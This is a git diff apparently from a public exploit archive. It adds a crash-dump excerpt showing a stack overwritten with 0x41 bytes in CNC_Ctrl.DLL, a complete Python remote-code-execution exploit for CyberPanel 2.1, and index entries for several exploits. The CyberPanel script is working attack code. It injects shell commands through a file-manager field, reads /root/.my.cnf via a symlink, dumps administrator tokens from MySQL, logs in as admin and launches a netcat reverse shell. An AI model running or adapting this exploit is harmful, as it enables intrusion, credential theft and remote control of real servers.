+00afe4b8 41414141 41414141 41414141 41414141 0x41414141
+00afe4bc 41414141 41414141 41414141 41414141 0x41414141
+00afe4c0 41414141 41414141 41414141 41414141 0x41414141
+00afe4c4 41414141 41414141 41414141 41414141 0x41414141
+00afe4c8 41414141 41414141 41414141 41414141 0x41414141
+00afe4cc 41414141 41414141 41414141 41414141 0x41414141
+00afe4d0 41414141 41414141 41414141 41414141 0x41414141
+00afe4d4 41414141 41414141 41414141 41414141 0x41414141
+00afe4d8 41414141 41414141 41414141 41414141 0x41414141
+00afe4dc 41414141 41414141 41414141 41414141 0x41414141
+00afe4e0 41414141 41414141 41414141 41414141 0x41414141
+00afe4e4 41414141 41414141 41414141 41414141 0x41414141
+00afe4e8 41414141 41414141 41414141 41414141 0x41414141
+00afe4ec 41414141 41414141 41414141 41414141 0x41414141
+00afe4f0 41414141 41414141 41414141 41414141 0x41414141
+00afe4f4 41414141 41414141 41414141 41414141 0x41414141
+00afe4f8 41414141 41414141 41414141 41414141 0x41414141
+00afe4fc 41414141 41414141 41414141 41414141 0x41414141
+00afe500 41414141 41414141 41414141 41414141 0x41414141
+00afe504 41414141 41414141 41414141 41414141 0x41414141
+00afe508 41414141 41414141 41414141 41414141 0x41414141
+00afe50c 41414141 41414141 41414141 41414141 0x41414141
+00afe510 41414141 41414141 41414141 41414141 0x41414141
+00afe514 41414141 41414141 41414141 41414141 0x41414141
+00afe518 41414141 41414141 41414141 41414141 0x41414141
+00afe51c 41414141 41414141 41414141 41414141 0x41414141
+00afe520 41414141 41414141 41414141 41414141 0x41414141
+00afe524 41414141 41414141 41414141 41414141 0x41414141
+00afe528 41414141 41414141 41414141 41414141 0x41414141
+00afe52c 41414141 41414141 41414141 41414141 0x41414141
+00afe530 41414141 41414141 41414141 41414141 0x41414141
+00afe534 41414141 41414141 41414141 41414141 0x41414141
+00afe538 41414141 41414141 41414141 41414141 0x41414141
+00afe53c 41414141 41414141 41414141 41414141 0x41414141
+00afe540 41414141 41414141 41414141 41414141 0x41414141
+00afe544 41414141 41414141 41414141 41414141 0x41414141
+00afe548 41414141 41414141 41414141 41414141 0x41414141
+00afe54c 41414141 41414141 41414141 41414141 0x41414141
+00afe550 41414141 41414141 41414141 41414141 0x41414141
+00afe554 41414141 41414141 41414141 41414141 0x41414141
+00afe558 41414141 41414141 41414141 41414141 0x41414141
+00afe55c 41414141 41414141 41414141 41414141 0x41414141
+00afe560 41414141 41414141 41414141 41414141 0x41414141
+00afe564 41414141 41414141 41414141 41414141 0x41414141
+00afe568 41414141 41414141 41414141 41414141 0x41414141
+00afe56c 41414141 41414141 41414141 41414141 0x41414141
+00afe570 41414141 41414141 41414141 41414141 0x41414141
+00afe574 41414141 41414141 41414141 41414141 0x41414141
+00afe578 41414141 41414141 41414141 41414141 0x41414141
+00afe57c 41414141 41414141 41414141 41414141 0x41414141
+00afe580 41414141 41414141 41414141 41414141 0x41414141
+00afe584 41414141 41414141 41414141 41414141 0x41414141
+00afe588 41414141 41414141 41414141 41414141 0x41414141
+00afe58c 41414141 41414141 41414141 41414141 0x41414141
+00afe590 41414141 41414141 41414141 41414141 0x41414141
+00afe594 41414141 41414141 41414141 41414141 0x41414141
+00afe598 41414141 41414141 41414141 41414141 0x41414141
+00afe59c 41414141 41414141 41414141 41414141 0x41414141
+00afe5a0 41414141 41414141 41414141 41414141 0x41414141
+00afe5a4 41414141 41414141 41414141 41414141 0x41414141
+00afe5a8 41414141 41414141 41414141 41414141 0x41414141
+00afe5ac 41414141 41414141 41414141 41414141 0x41414141
+00afe5b0 41414141 41414141 41414141 41414141 0x41414141
+00afe5b4 41414141 41414141 41414141 41414141 0x41414141
+00afe5b8 41414141 41414141 41414141 41414141 0x41414141
+00afe5bc 41414141 41414141 41414141 41414141 0x41414141
+00afe5c0 41414141 41414141 41414141 41414141 0x41414141
+00afe5c4 41414141 41414141 41414141 41414141 0x41414141
+00afe5c8 41414141 41414141 41414141 41414141 0x41414141
+00afe5cc 41414141 41414141 41414141 41414141 0x41414141
+00afe5d0 41414141 41414141 41414141 41414141 0x41414141
+00afe5d4 41414141 41414141 41414141 41414141 0x41414141
+00afe5d8 41414141 41414141 41414141 41414141 0x41414141
+00afe5dc 41414141 41414141 41414141 41414141 0x41414141
+00afe5e0 41414141 41414141 41414141 41414141 0x41414141
+00afe5e4 41414141 41414141 41414141 41414141 0x41414141
+00afe5e8 41414141 41414141 41414141 41414141 0x41414141
+00afe5ec 41414141 41414141 41414141 41414141 0x41414141
+00afe5f0 41414141 41414141 41414141 41414141 0x41414141
+00afe5f4 41414141 41414141 41414141 41414141 0x41414141
+
+STACK_COMMAND: ~0s ; .cxr ; kb
+
+THREAD_SHA1_HASH_MOD_FUNC: 1ff3866701b0a93c59477aaf393ad9182c6cbb4f
+
+THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 31358b3bd1a2fecfa57be49dd21574669d1b1ea2
+
+THREAD_SHA1_HASH_MOD: 2219bd78d12868af57c664db206871e4461019b1
+
+FAULT_INSTR_CODE: 12d49989
+
+SYMBOL_STACK_INDEX: 0
+
+SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+18ee3
+
+FOLLOWUP_NAME: MachineOwner
+
+MODULE_NAME: CNC_Ctrl
+
+IMAGE_NAME: CNC_Ctrl.DLL
+
+DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821
+
+FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
+
+BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+18ee3
+
+FAILURE_EXCEPTION_CODE: c0000005
+
+FAILURE_IMAGE_NAME: CNC_Ctrl.DLL
+
+BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL
+
+FAILURE_MODULE_NAME: CNC_Ctrl
+
+BUCKET_ID_MODULE_STR: CNC_Ctrl
+
+FAILURE_FUNCTION_NAME: DllUnregisterServer
+
+BUCKET_ID_FUNCTION_STR: DllUnregisterServer
+
+BUCKET_ID_OFFSET: 18ee3
+
+BUCKET_ID_MODTIMEDATESTAMP: 547ed821
+
+BUCKET_ID_MODCHECKSUM: 357a4b
+
+BUCKET_ID_MODVER_STR: 1.7.0.2
+
+BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
+
+FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
+
+FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer
+
+WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/wscript.exe/5.812.10240.16384/7159f3df/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/00027da1.htm?Retriage=1
+
+TARGET_TIME: 2021-08-12T11:37:22.000Z
+
+OSBUILD: 19042
+
+OSSERVICEPACK: 1023
+
+SERVICEPACK_NUMBER: 0
+
+OS_REVISION: 0
+
+OSPLATFORM_TYPE: x64
+
+OSNAME: Windows 10
+
+OSEDITION: Windows 10 WinNt SingleUserTS Personal
+
+USER_LCID: 0
+
+OSBUILD_TIMESTAMP: unknown_date
+
+BUILDDATESTAMP_STR: 160101.0800
+
+BUILDLAB_STR: WinBuild
+
+BUILDOSVER_STR: 10.0.19041.1023
+
+ANALYSIS_SESSION_ELAPSED_TIME: 68b2
+
+ANALYSIS_SOURCE: UM
+
+FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
+
+FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
+
+Followup: MachineOwner
+---------
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50230.py b/exploits/multiple/webapps/50230.py
new file mode 100755
index 000000000..473531598
--- /dev/null
+++ b/exploits/multiple/webapps/50230.py
@@ -0,0 +1,203 @@
+# Title: CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 27.08.2021
+# Author: Numan Türle
+# Vendor Homepage: https://cyberpanel.net/
+# Software Link: https://github.com/usmannasir/cyberpanel
+# Version: <=2.1
+# https://www.youtube.com/watch?v=J_8iLELVgkE
+
+
+#!/usr/bin/python3
+# -*- coding: utf-8 -*-
+# CyberPanel - Remote Code Execution (Authenticated)
+# author: twitter.com/numanturle
+# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
+# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password
+
+
+import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from cmd import Cmd
+
+warnings.simplefilter('ignore',InsecureRequestWarning)
+
+def init():
+ parser = argparse.ArgumentParser(description='CyberPanel Remote Code Execution')
+ parser.add_argument('-u','--host',help='Host', type=str, required=True)
+ parser.add_argument('-l', '--login',help='Username', type=str, required=True)
+ parser.add_argument('-p', '--password',help='Password', type=str, required=True)
+ parser.add_argument('-f', '--file',help='File', type=str)
+ args = parser.parse_args()
+ exploit(args)
+
+def exploit(args):
+ def on_open(ws):
+ verifyPath,socket_password
+ print("[+] Socket connection successful")
+ print("[+] Trying a reverse connection")
+ ws.send(json.dumps({"tp":"init","data":{"verifyPath":verifyPath,"password":socket_password}}))
+ ws.send(json.dumps({"tp":"client","data":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 1337 >/tmp/f\r","verifyPath":verifyPath,"password":socket_password}))
+ ws.close()
+
+ def on_close(ws, close_status_code, close_msg):
+ print("[+] Successful")
+ print("[!] Disconnect from socket")
+
+
+ session = requests.Session()
+ target = "https://{}:8090".format(args.host)
+ username = args.login
+ password = args.password
+
+ print("[+] Target {}".format(target))
+
+ response = session.get(target, verify=False)
+ session_hand = session.cookies.get_dict()
+ token = session_hand["csrftoken"]
+
+ print("[+] Token {}".format(token))
+
+ headers = {
+ 'X-Csrftoken': token,
+ 'Cookie': 'csrftoken={}'.format(token),
+ 'Referer': target
+ }
+
+ login = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":username,"password":password,"languageSelection":"english"})
+ login_json = json.loads(login.content)
+
+ if login_json["loginStatus"]:
+ session_hand_login = session.cookies.get_dict()
+
+ print("[+] Login Success")
+ print("[+] Send request fetch websites list")
+
+ headers = {
+ 'X-Csrftoken': session_hand_login["csrftoken"],
+ 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
+ 'Referer': target
+ }
+
+ feth_weblist = session.post(target+"/websites/fetchWebsitesList", headers=headers, verify=False, json={"page":1,"recordsToShow":10})
+ feth_weblist_json = json.loads(feth_weblist.content)
+
+ if feth_weblist_json["data"]:
+
+ weblist_json = json.loads(feth_weblist_json["data"])
+ domain = weblist_json[0]["domain"]
+ domain_folder = "/home/{}".format(domain)
+
+ print("[+] Successfully {} selected".format(domain))
+ print("[+] Creating ssh pub")
+
+ remove_ssh_folder = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"path":domain_folder,"method":"deleteFolderOrFile","fileAndFolders":[".ssh"],"domainRandomSeed":"","domainName":domain,"skipTrash":1})
+ create_ssh = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
+ create_ssh_json = json.loads(create_ssh.content)
+
+ if create_ssh_json["status"]:
+ key = create_ssh_json["deploymentKey"]
+
+ print("[+] Key : {}".format(key))
+
+ explode_key = key.split()
+ explode_username = explode_key[-1].split("@")
+
+ if explode_username[0]:
+ username = explode_username[0]
+ hostname = explode_username[1]
+
+ print("[+] {} username selected".format(username))
+ print("[+] Preparing for symlink attack")
+ print("[+] Attempting symlink attack with user-level command execution vulnerability #1")
+
+ target_file = args.file
+ if not target_file:
+ target_file = "/root/.my.cnf"
+ domain_folder_ssh = "{}/.ssh".format(domain_folder)
+ command = "rm -rf {}/{}.pub;ln -s {} {}/{}.pub".format(domain_folder_ssh,username,target_file,domain_folder_ssh,username)
+ completeStartingPath = "{}';{};'".format(domain_folder,command)
+
+ #filemanager/controller - completeStartingPath - command execution vulnerability
+
+ symlink = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
+ symlink_json = json.loads(symlink.content)
+
+ if symlink_json["status"]:
+ print("[+] [SUDO] Arbitrary file reading via symlink --> {} #2".format(target_file))
+
+ read_file = session.post(target+"/websites/fetchFolderDetails", headers=headers, verify=False, json={"domain":domain,"folder":"{}".format(domain_folder)})
+ read_file_json = json.loads(read_file.content)
+ read_file = read_file_json["deploymentKey"]
+ if not args.file:
+ print("-----------------------------------")
+ print(read_file.strip())
+ print("-----------------------------------")
+
+ mysql_password = re.findall('password=\"(.*?)\"',read_file)[0]
+ steal_token = "rm -rf token.txt;mysql -u root -p\"{}\" -D cyberpanel -e \"select token from loginSystem_administrator\" > '{}/token.txt".format(mysql_password,domain_folder)
+
+ print("[+] Fetching users tokens")
+
+ completeStartingPath = "{}';{}".format(domain_folder,steal_token)
+ steal_token_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"completeStartingPath":completeStartingPath,"method":"listForTable","home":domain_folder,"domainRandomSeed":"","domainName":domain})
+ token_file = domain_folder+"/token.txt"
+ steal_token_read_request = session.post(target+"/filemanager/controller", headers=headers, verify=False, json={"fileName":token_file,"method":"readFileContents","domainRandomSeed":"","domainName":domain})
+ leak = json.loads(steal_token_read_request.content)
+ leak = leak["fileContents"].replace("Basic ","").strip().split("\n")[1:]
+ print("------------------------------")
+ for user in leak:
+ b64de = base64.b64decode(user).decode('utf-8')
+ exp_username = b64de.split(":")
+ if exp_username[0] == "admin":
+ admin_password = exp_username[1]
+ print("[+] " + b64de)
+ print("------------------------------")
+ print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
+ print("[+] Try login admin")
+
+ headers = {
+ 'X-Csrftoken': token,
+ 'Cookie': 'csrftoken={}'.format(token),
+ 'Referer': target
+ }
+ login_admin = session.post(target+"/verifyLogin", headers=headers, verify=False, json={"username":"admin","password":admin_password,"languageSelection":"english"})
+ login_json = json.loads(login_admin.content)
+ if login_json["loginStatus"]:
+ session_hand_login = session.cookies.get_dict()
+
+ print("[+] 4dm1n_l061n_5ucc355")
+ print("[+] c0nn3c71n6_70_73rm1n4l")
+ headers = {
+ 'X-Csrftoken': session_hand_login["csrftoken"],
+ 'Cookie': 'csrftoken={};sessionid={}'.format(token,session_hand_login["sessionid"]),
+ 'Referer': target
+ }
+
+ get_websocket_token = session.get(target+"/Terminal", headers=headers, verify=False)
+ verifyPath = re.findall('id=\"verifyPath\">(.*?)',str(get_websocket_token.content))[-1]
+ socket_password = re.findall('id=\"password\">(.*?)',str(get_websocket_token.content))[-1]
+ print("[+] verifyPath {}".format(verifyPath))
+ print("[+] socketPassword {}".format(socket_password))
+ print("[+] Trying to connect to socket")
+ ws = websocket.WebSocketApp("wss://{}:5678".format(args.host),
+ on_open=on_open,
+ on_close=on_close)
+ ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
+
+ else:
+ print("[-] Auto admin login failed")
+ else:
+ print(read_file)
+ else:
+ print("[-] Unexpected")
+ else:
+ print("[-] Username selected failed")
+ else:
+ print("[-] Fail ssh pub")
+ else:
+ print("[-] List error")
+ else:
+ print("[-] AUTH : Login failed msg: {}".format(login_json["error_message"]))
+
+if __name__ == "__main__":
+ init()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 077fe38f2..ccd72602f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44354,3 +44354,6 @@ id,file,description,date,author,type,platform,port
50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",2021-08-25,"Tyler Butler",webapps,hardware,
50228,exploits/php/webapps/50228.py,"Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)",2021-08-25,"Justin White",webapps,php,
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,
+50230,exploits/multiple/webapps/50230.py,"CyberPanel 2.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-27,"numan türle",webapps,multiple,
+50231,exploits/hardware/webapps/50231.txt,"COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,
+50232,exploits/hardware/webapps/50232.txt,"COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow",2021-08-27,LiquidWorm,webapps,hardware,